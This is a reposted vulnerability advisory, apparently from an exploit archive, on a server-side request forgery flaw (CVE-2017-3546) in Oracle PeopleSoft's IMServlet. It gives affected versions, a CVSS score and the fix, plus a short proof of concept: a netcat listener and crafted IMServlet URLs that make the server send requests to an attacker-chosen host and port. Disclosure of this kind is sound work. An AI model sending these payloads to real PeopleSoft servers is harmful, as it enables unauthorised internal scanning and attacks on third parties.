Oracle PeopleSoft - Server-Side Request Forgery Vulnerability

2017-05-20T00:00:00
ID 1337DAY-ID-27806
Type zdt
Reporter ERPScan
Modified 2017-05-20T00:00:00

Description

Exploit for java platform in category web applications

                                        
                                            Application: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55;
PeopleSoft HCM 9.2
Vendor URL: http://oracle.com
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Roman Shalymov (ERPScan)
 
Description
 
1. ADVISORY INFORMATION
 
Title:[ERPSCAN-17-022] SSRF in PeopleSoft IMServlet
Advisory ID: [ERPSCAN-17-022]
Risk: high
CVE: CVE-2017-3546
Advisory URL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/
Date published: 18.04.2017
Vendors contacted: Oracle
 
 
2. VULNERABILITY INFORMATION
 
Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
 
CVSS Information
 
CVSS Base Score v3:    8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
 
 
3. VULNERABILITY DESCRIPTION
 
An attacker can force a vulnerable server to trigger malicious
requests to third-party servers or to internal resources. This
vulnerability can then be leveraged to launch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.
 
4. VULNERABLE PACKAGES
 
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, implement Oracle CPU April 2017
 
6. AUTHOR
 
Roman Shalymov
 
7. TECHNICAL DESCRIPTION
 
PoC
 
Run netcat
 
1. nc -l -p # on some host
 
In browser open the following links
 
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
 
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
 
 
Read response in netcat
 
GET /?param=var HTTP/1.1
 
User-Agent: Java1.7.0_95
 
Host: SOMEHOST:OPEN_PORT
 
Accept: text/html, image/gif, image/jpeg, /; q=.2
 
Connection: Keep-Alive

#  0day.today [2018-04-12]  #